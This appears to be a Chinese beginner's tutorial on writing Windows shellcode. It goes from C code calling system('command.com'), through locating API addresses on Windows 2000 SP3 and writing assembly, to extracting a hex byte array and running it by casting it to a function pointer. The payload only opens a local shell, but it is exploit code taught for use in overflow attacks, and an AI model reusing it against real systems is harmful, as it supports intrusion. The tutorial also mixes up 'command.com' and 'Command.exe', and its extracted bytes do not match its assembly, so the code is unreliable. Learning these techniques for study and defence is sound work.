為了幫助初學者了解ShellCode的編寫，并能一步一步操作得到自己的ShellCode，因此將Windows下ShellCode的編寫過程作詳細的介紹，以利于像我一樣的菜鳥，最終能夠寫出簡單的但卻是真實的ShellCode；而進一步高級的ShellCode的編寫，也會在系列后面的文章中一步一步的演示的，希望大家會發現，Exp真好，ShellCode最美妙！
ShellCode簡介和編寫步驟
從以前的文章和別人的攻擊代碼中可以知道，ShellCode是以“\xFF\x3A\x45\x72……”的形式出現在程序中的，而Exploit的構造就是想方設法地使計算機能轉到我們的ShellCode上來，去執行“\xFF\x3A\x45\x72……”――由此看出，ShellCode才是Exploit攻擊的真正主宰（就如同獨行者是我們文章的主宰一樣）。而ShellCode的“\xFF\x3A\x45\x72……”那些值，其實是機器碼的形式，和一般程序在內存里面存的東東是沒什么兩樣的，攻擊程序把內存里面的數據動態改成ShellCode的值，再跳過去執行，就如同執行一個在內存中的一般程序一樣，只不過完成的是我們的功能，溢出攻擊就這樣實現了。
在此可以下個定義：ShellCode就是一段程序的機器碼形式，而ShellCode的編寫過程，就是得到我們想要程序的機器碼的過程。
當然ShellCode的特殊性和Windows下函數調用的特點，決定了和一般的匯編程序有所不同。所以其編寫步驟應該是，
1．構想ShellCode的功能；
2．用C語言驗證實現；
3．根據C語言實現，改成帶有ShellCode特點的匯編；
4．最后得到機器碼形式的ShellCode。
其中最重要的是第三步――改成有ShellCode特點的匯編，將在本文的后面講到。
首先第一步是構想ShellCode的功能。我們想要的功能可能是植入木馬，殺掉防火墻，倒流時光，發電磁波找外星人等等（WTF：咳……），但最基本的功能，還是希望開一個DOS窗口，那我們可以在DOS窗口中做很多事情，所以先介紹開DOS窗口ShellCode的寫法吧。
C語言代碼
比如下面這個程序就可以完成開DOS窗口的功能，大家詳細看下注釋：
#include
#include
typedef void (*MYPROC)(LPTSTR); //定義函數指針
int main()
{
HINSTANCE LibHandle;
MYPROC ProcAdd;
LibHandle = LoadLibrary(“msvcrt.dll”);
ProcAdd = (MYPROC) GetProcAddress(LibHandle, "System"); //查找System函數地址
(ProcAdd) ("command.com"); //其實就是執行System(“command.com”)
return 0;
}
其實執行System(“command.com”)也可以完成開DOS窗口的功能，寫成這么復雜是有原因的，解釋一下該程序：首先Typedef void (*MYPROC)(LPTSTR)是定義一個函數指針類型，該類型的函數參數為是字符串，返回值為空。接著定義MYPROC ProcAdd，使ProcAdd為指向參數為是字符串，返回值為空的函數指針；使用LoadLibrary(“msvcrt.dll”);裝載動態鏈接庫msvcrt.dll；再使用ProcAdd = (MYPROC) GetProcAddress(LibHandle, System)獲得 System的真實地址并賦給ProcAdd，之后ProcAdd里存的就是System函數的地址，以后使用這個地址來調用System函數；最后(ProcAdd) ("command.com")就是調用System("command.com")，可以獲得一個DOS窗口。在窗口中我們可以執行Dir，Copy等命令。如下圖1所示。




圖1
獲得函數的地址
程序中用GetProcAddress函數獲得System的真實地址，但地址究竟是多少，如何查看呢？
在VC中，我們按F10進入調試狀態，然后在Debug工具欄中點最后一個按鈕Disassemble和第四個按鈕Registers，這樣出現了源程序的匯編代碼和寄存器狀態窗口，如圖2所示




圖2
繼續按F10執行，直到到ProcAdd = (MYPROC) GetProcAddress(LibHandle, "System")語句下的Cll dword ptr [__imp__GetProcAddress@8 (00424194)]執行后，EAX變為7801AFC3，說明在我的機器上System( )函數的地址是0x7801AFC3。如圖3所示。




圖3
WTF：注意本次測試中讀者的機器是Windows 2000 SP3，不同環境可能地址不同。
為什么EAX就是System( )函數的地址呢？那是因為函數執行的返回值，在匯編下通常是放在EAX中的，這算是計算機系統的約定吧，所以GetProcAddress（”System”）的返回值（System函數的地址），就在EAX中，為0x7801AFC3。
Windows下函數的調用原理
為什么要這么麻煩的得到System函數的地址呢？這是因為在Windows下，函數的調用方法是先將參數從右到左壓入堆棧，然后Call該函數的地址。比如執行函數Fun（argv1, argv2），先把參數從右到左壓入堆棧，這里就是依次把argv2，argv1壓入堆棧里，然后Call Fun函數的地址。這里的Call Fun函數地址，其實等于兩步，一是把保存當前EIP，二是跳到Func函數的地址執行，即Push EIP ＋ Jmp Fun。其過程如下圖4所示。




圖4
同理，我們要執行System("command.com")：首先參數入棧，這里只有一個參數，所以就把Command.com的地址壓入堆棧，注意是Command.com字符串的地址；然后Call System函數的地址，就完成了執行。如圖5所示。




圖5
構造有ShellCode特點的匯編
明白了Windows函數的執行原理，我們要執行System(“Command.exe”)，就要先把Command.exe字符串的地址入棧，但Command.exe字符串在哪兒呢？內存中可能沒有，但我們可以自己構造！
我們把‘Command.exe’一個字符一個字符的賦給堆棧，這樣‘Command.exe’字符串就有了，而棧頂的指針ESP正好是Command.exe字符串的地址，我們Push esp，就完成了參數――Command.exe字符串的地址入棧。如下圖6所示。




圖6
參數入棧了，然后該Call System函數的地址。剛才已經看到，在Windows 2000 SP3上，System函數的地址為0x7801AFC3，所以Call 0x7801AFC3就行了。
把思路合起來，可以寫出執行System(“Command.exe”)的帶有ShellCode特點的匯編代碼如下。
mov esp,ebp ;
push ebp ;
mov ebp,esp ; 把當前esp賦給ebp
xor edi,edi ;
push edi ;壓入0，esp－4,; 作用是構造字符串的結尾\0字符。
sub esp,08h ;加上上面，一共有12個字節,;用來放"command.com"。
mov byte ptr [ebp-0ch],63h ; c
mov byte ptr [ebp-0bh],6fh ; o
mov byte ptr [ebp-0ah],6dh ; m
mov byte ptr [ebp-09h],6Dh ; m
mov byte ptr [ebp-08h],61h ; a
mov byte ptr [ebp-07h],6eh ; n
mov byte ptr [ebp-06h],64h ; d
mov byte ptr [ebp-05h],2Eh ; .
mov byte ptr [ebp-04h],63h ; c
mov byte ptr [ebp-03h],6fh ; o
mov byte ptr [ebp-02h],6dh ; m一個一個生成串"command.com".
lea eax,[ebp-0ch] ;
push eax ; command.com串地址作為參數入棧
mov eax, 0x7801AFC3 ;
call eax ; call System函數的地址
明白了原理再看實現，是不是清楚了很多呢？
提取ShellCode
首先來驗證一下，在VC中可以用__asm關鍵字插入匯編，我們把System(“Command.exe”)用我們寫的匯編替換，LoadLibrary先不動，然后執行，成功！彈出了我們想要的DOS窗口。如下圖7所示。




圖7
同樣的道理，LoadLibrary(“msvcrt.dll”)也仿照上面改成匯編，注意LoadLibrary在Windows 2000 SP3上的地址為0x77e69f64。把兩段匯編合起來，將其編譯、鏈接、執行，也成功了！如下圖8所示。




圖8
有了上面的工作，提取ShellCode就只剩下體力活了。我們對剛才的全匯編的程序，按F10進入調試，接著按下Debug工具欄的Disassembly按鈕，點右鍵，在彈出菜單中選中Code Bytes，就出現匯編對應的機器碼。因為匯編可以完全完成我們的功能，所以我們把匯編對應的機器碼原封不動抄下來，就得到我們想要的ShellCode了。提取出來的ShellCode如下。
unsigned char shellcode[] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
"\x64\x9f\xE6\x77" //sp3 loadlibrary地址0x77e69f64
"\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8"
"\xc3\xaf\x01\x78" //sp3 System地址0x7801afc3
"\xFF\xD0";
驗證ShellCode
最后要驗證提取出來的ShellCode能否完成我們的功能。在以前的文章中已經說過方法，只需要新建一個工程和c源文件，然后把ShellCode部分拷下來，存為一個數組，最后在main中添上( (void(*)(void)) &shellcode )()，如下：
unsigned char shellcode[] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
"\x64\x9f\xE6\x77" //sp3 loadlibrary地址0x77e69f64
"\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8"
"\xc3\xaf\x01\x78" //sp3 System地址0x7801afc3
"\xFF\xD0";
int main()
{
( (void(*)(void)) &shellcode )()
return 0;
}
( (void(*)(void)) &shellcode )()這句話是關鍵，它把ShellCode轉換成一個參數為空，返回為空的函數指針，并調用它。執行那句就相當于執行ShellCode數組里的那些數據。如果ShellCode正確，就會完成我們想要的功能，出現一個DOS窗口。我們親自編寫的第一個ShellCode成功完成！

小結
這個ShellCode的功能還比較單薄，而且通用性也待進一步研究，但的確是一個由我們親自打造出來的ShellCode，而且現實中的ShellCode也是這樣寫出來的。只要我們掌握了基本的方法，以后就可以在廣闊的空間中自由翱翔！